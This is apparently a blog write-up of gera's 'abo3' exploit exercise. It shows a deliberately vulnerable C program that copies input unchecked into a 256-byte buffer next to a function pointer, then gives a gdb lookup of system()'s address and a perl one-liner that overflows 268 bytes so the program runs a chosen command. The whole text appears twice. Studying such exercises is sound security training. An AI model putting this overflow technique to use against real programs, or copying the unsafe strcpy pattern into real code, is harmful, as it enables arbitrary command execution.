/* abo3.c *
* specially crafted to feed your brain by gera */
/* This'll prepare you for The Next Step */
int main(int argv,char **argc) {
extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;
char buf[256];
fn=(void(*)(char*))&puts;
strcpy(buf,argc[1]);
fn(argc[2]);
exit(1);
}
main's stack frame looks something like:
eip
ebp
fn
.
.
buf
fn is a function pointer that points at system() and then it is changed to point to puts(), we need to reset this so that it points back to system().
First order of business is to figure out the address of system():
(gdb) x/x system
0x8048318: 0x96a425ff
Next order is to overflow buf and overwrite fn to point back to system():
268 bytes get us to the start of fn
$ abo3 `perl -e 'print "A" x 268 . "\x18\x83\x04\x08"';` 'echo "you win!"'
you win!
* specially crafted to feed your brain by gera */
/* This'll prepare you for The Next Step */
int main(int argv,char **argc) {
extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;
char buf[256];
fn=(void(*)(char*))&puts;
strcpy(buf,argc[1]);
fn(argc[2]);
exit(1);
}
main's stack frame looks something like:
eip
ebp
fn
.
.
buf
fn is a function pointer that points at system() and then it is changed to point to puts(), we need to reset this so that it points back to system().
First order of business is to figure out the address of system():
(gdb) x/x system
0x8048318
Next order is to overflow buf and overwrite fn to point back to system():
268 bytes get us to the start of fn
$ abo3 `perl -e 'print "A" x 268 . "\x18\x83\x04\x08"';` 'echo "you win!"'
you win!
No comments:
Post a Comment